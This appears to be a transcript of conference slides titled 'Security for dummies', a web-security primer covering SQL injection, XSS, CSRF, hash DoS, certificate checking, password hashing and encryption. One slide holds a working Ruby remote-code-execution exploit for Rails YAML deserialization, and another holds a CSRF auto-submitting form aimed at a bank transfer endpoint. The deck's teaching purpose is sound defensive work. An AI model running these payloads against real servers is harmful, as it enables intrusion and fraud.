Security for dummies

Transcript

1. Dirkjan Bussink
   [email protected]
   twitter.com/dbussink
   github.com/dbussink
   

   View Slide

2. Security 101
   The very very basics
   

   View Slide

3. Not part of today
   

   View Slide

4. Social
   Engineering
   Because there is no patch
   for human stupidity
   

   View Slide

5. statement = "SELECT * FROM users WHERE name = '" + username + "'"
   SQL Injection
   

   View Slide

6. View Slide

7. statement = ["SELECT * FROM users WHERE name = ?", username]
   SQL Injection
   Parameter binding
   

   View Slide

8. Cross site
   scripting
   <%= person.name %>
   Inject Javascript!
   

   View Slide

9. Mass assignment
   
   
   
   
   
   
   
   
   
   What if I add this?
   

   View Slide

10. Frameworks
    Solve it easily for you
    

    View Slide

11. Remote code
    execution
    Let the server run my
    ruby rce.rb "Process.exit!"
    

    View Slide

12. require 'net/http'
    require 'net/https'
    require 'uri'
    require 'yaml'
    code = ARVG[0]
    url = "http://localhost:3000"
    escaped_code = "foo; #{code}\n__END__\n"
    yaml = %{
    --- !ruby/hash:ActionDispatch::Routing::RouteSet::NamedRouteCollection
    ? #{escaped_code.to_yaml.sub('--- ','').chomp}
    : !ruby/object:OpenStruct
    table:
    :defaults:
    :action: create
    :controller: foos
    :required_parts: []
    :requirements:
    :action: create
    :controller: foos
    :segment_keys:
    - :format
    modifiable: true
    }.strip
    xml = %{
    
    #{yaml}
    }.strip
    uri = URI.parse(url)
    http = Net::HTTP.new(uri.host, uri.port)
    request = Net::HTTP::Post.new(uri.request_uri, "X-HTTP-Method-Override" => "GET")
    request.content_type = "text/xml"
    request.set_body_internal(xml)
    response = http.request(request)
    

    View Slide

13. Direct object
    references
    http://myapp.com/people/1
    Let’s change this to 2!
    

    View Slide

14. Access
    control
    Scope your queries
    

    View Slide

15. External
    input
    Trust nobody
    

    View Slide

16. View Slide

17. Set-Cookie: session_id=lee2oochaekae4woh6A; path=/;
    document.cookie => "session_id=lee2oochaekae4woh6A;"
    Steal cookie in combination
    with a XSS attack
    

    View Slide

18. Set-Cookie: session_id=lee2oochaekae4woh6A; path=/; HttpOnly
    document.cookie => ""
    HttpOnly
    Disallows reading by Javascript
    

    View Slide

19. Set-Cookie: session_id=lee2oochaekae4woh6A; path=/; HttpOnly; secure
    Secure
    Only send cookie over HTTPS
    

    View Slide

20. Frameworks
    Use one that solves this
    

    View Slide

21. CSRF
    Who submits your forms?
    

    View Slide

22. View Slide

23. On my evil hack site
    Just loading my page
    transfers money
    
    <br/>document.write('<form target=hack name=go<br/>method=post action="http://mybank.com/transfer.php"><br/></form>')<br/>go.submit()<br/>
    

    View Slide

24. 
    
    
    
    
    
    
    
    
    
    
    Add token to each form
    Token ensures other site
    can’t simply POST to your
    

    View Slide

25. Hash DOS
    Crafting input
    to do DOS attack
    

    View Slide

26. Bucket
    0
    1
    2
    3
    4
    5
    Figure 1: Normal operation of a hash table.
    suggested the use of crypto puzzles [9] to force
    clients to perform more work before the server does
    its work. Provably requiring the client to con-
    sume CPU time may make sense for fundamen-
    tally expensive operations like RSA decryption, but
    it seems out of place when the expensive opera-
    tion (e.g., HTML table layout) is only expensive
    because a poor algorithm was used in the system.
    Another recent paper [16] is a toolkit that allows
    programmers to inject sensors and actuators into a
    program. When a resource abuse is detected an ap-
    propriate action is taken.
    Bucket
    0
    1
    2
    3
    4
    5
    Figure 2: Worst-case hash table collisions.
    bles are so common that programming languages
    like Perl provide syntactic sugar to represent hash
    tables as “associative arrays,” making them easy for
    programmers to use. Programmers clearly prefer
    hash tables for their constant-time expected behav-
    ior, despite their worst-case O(n) per-operation run-
    ning time. After all, what are the odds that a hash
    table will degenerate to its worst case behavior?
    In typical usage, objects to be inserted into a
    hashtable are first reduced to a 32-bit hash value.
    Strings might be hashed using a checksum oper-
    Craft input for collision
    

    View Slide

27. Hashes
    everywhere
    A lot of attack vectors
    

    View Slide

28. SSL in your app
    Verify certificates
    

    View Slide

29. curl_easy_setopt(download_handle, CURLOPT_SSL_VERIFYHOST, 2);
    2 is the magic value...
    

    View Slide

30. $fp = fsockopen ('ssl://www.paypal.com', 443, $errno, $errstr, 30);
    fsockopen() does not
    validate server certificate
    PHP
    

    View Slide

31. The “advanced” SSLSocketFactory API silently
    skips hostname verification if the algorithm field
    in the SSL client is NULL or an empty string rather
    than HTTPS
    Java
    Why this as the default?
    

    View Slide

32. require "net/http"
    require "net/https"
    require "uri"
    uri = URI.parse("https://secure.site/")
    http = Net::HTTP.new uri.host, uri.port
    http.use_ssl = true
    http.verify_mode = OpenSSL::SSL::VERIFY_PEER
    request = Net::HTTP::Get.new(uri.request_uri)
    response = http.request(request)
    Ruby
    Does not validate
    certificate by default...
    

    View Slide

33. Stupid API’s
    Know how to work with them
    

    View Slide

34. Storing
    passwords
    Can I get the passwords
    stored in your database?
    

    View Slide

35. View Slide

36. But I’m safe, I hash and salt!
    Digest::SHA1.hexdigest(
    "#{password}--#{salt}"
    )
    

    View Slide

37. 1.93% were between 6 and 10 characters long
    2.45% were comprised entirely of lowercase characters
    3.36% were found in a common password dictionary
    4.67% were reused by the same person on a totally unrelated service (Gawker)
    5.Only 1% of them contained a non-alphanumeric character
    77 million breached
    PlayStation Network accounts
    

    View Slide

38. 260M checks / second
    GPU acceleration makes
    forcing viable these days
    

    View Slide

39. Salted hashes are
    not good enough
    anymore
    

    View Slide

40. Libraries
    Use them, don’t roll your ow
    

    View Slide

41. bcrypt
    PBKDF2
    scrypt
    

    View Slide

42. Designed
    to be slow
    

    View Slide

43. KDF 6 letters 8 letters 8 chars 10 chars 40-char text
    DES CRYPT < $1 < $1 < $1 < $1 < $1
    MD5 < $1 < $1 < $1 $1.1k $1
    MD5 CRYPT < $1 < $1 $130 $1.1M $1.4k
    PBKDF2 (100 ms) < $1 < $1 $18k $160M $200k
    bcrypt (95 ms) < $1 $4 $130k $1.2B $1.5M
    scrypt (64 ms) < $1 $150 $4.8M $43B $52M
    PBKDF2 (5.0 s) < $1 $29 $920k $8.3B $10M
    bcrypt (3.0 s) < $1 $130 $4.3M $39B $47M
    scrypt (3.8 s) $900 $610k $19B $175T $210B
    

    View Slide

44. I have something
    else now!
    Migration is not
    very hard
    

    View Slide

45. Add new authentication
    When user logs in, store password in new way
    After X time remove old passwords
    

    View Slide

46. Signing
    Don’t design your own
    

    View Slide

47. user_id=1--kee0oiviemaeXiW7aeb8eexuthohyua
    Signed cookies
    Hash computed with secret
    

    View Slide

48. http://myapp.com/profile/1/wa5eexuf9wiex1do
    Email URL with direct login
    Hash for one time login
    

    View Slide

49. Digest::SHA1.hexdigest(
    "user_id=#{id}-#{secret_token}"
    )
    Hash with a secret
    Broken
    

    View Slide

50. sha256 = OpenSSL::Digest::Digest.new('sha256')
    tag = OpenSSL::HMAC.hexdigest(sha256, secret_token, message)
    HMAC
    hash-based message authentication code
    

    View Slide

51. Encryption
    Know what you are doing
    

    View Slide

52. AES ECB
    Just don’t use it
    

    View Slide

53. View Slide

54. AES CBC / CTR
    When using CBC mode, an Initialization Vector (IV) is provided along
    with the key when starting an encrypt or decrypt operation.
    If CBC mode is selected and no IV is provided, an IV of all zeroes will be used.
    

    View Slide

55. Don’t trust input
    Also sign encrypted data
    

    View Slide

56. cookie = "j2x+8Y5CqDRnYqRvMsHmi61YBzA7qvc4f7agmYxdHgvqz
    7Jaekoxjp3MrgSvB3GU--kc/FbSvFIfIFzM0UzQhhvw=="
    Encrypted cookie
    aes-128-cbc
    

    View Slide

57. "so long, and thanks for all the fish"
    

    View Slide

58. Encrypt then MAC
    Verify that the
    data is authentic
    

    View Slide

59. Authenticated
    encryption
    

    View Slide

60. View Slide

61. https://www.owasp.org/index.php/Top_10_2010-Main
    https://www.owasp.org/index.php/SQL_Injection
    https://www.owasp.org/index.php/Top_10_2010-A4
    https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
    https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)
    http://www.cs.rice.edu/~scrosby/hash/CrosbyWallach_UsenixSec2003.pdf
    http://www.cs.utexas.edu/~shmat/shmat_ccs12.pdf
    http://www.troyhunt.com/2011/06/brief-sony-password-analysis.html
    http://gpuscience.com/cs/cracking-salted-sha1-password-hashes-on-gpu/
    http://www.bsdcan.org/2009/schedule/attachments/86_scrypt_slides.pdf
    http://en.wikipedia.org/wiki/Hash-based_message_authentication_code
    http://blog.jcoglan.com/2012/06/09/why-you-should-never-use-hash-functions-for-message-authentication/
    http://en.wikipedia.org/wiki/Block_cipher_modes_of_operation#Electronic_codebook_.28ECB.29
    http://en.wikipedia.org/wiki/Padding_oracle_attack
    http://tonyarcieri.com/all-the-crypto-code-youve-ever-written-is-probably-broken
    https://www.coursera.org/course/crypto
    Background
    

    View Slide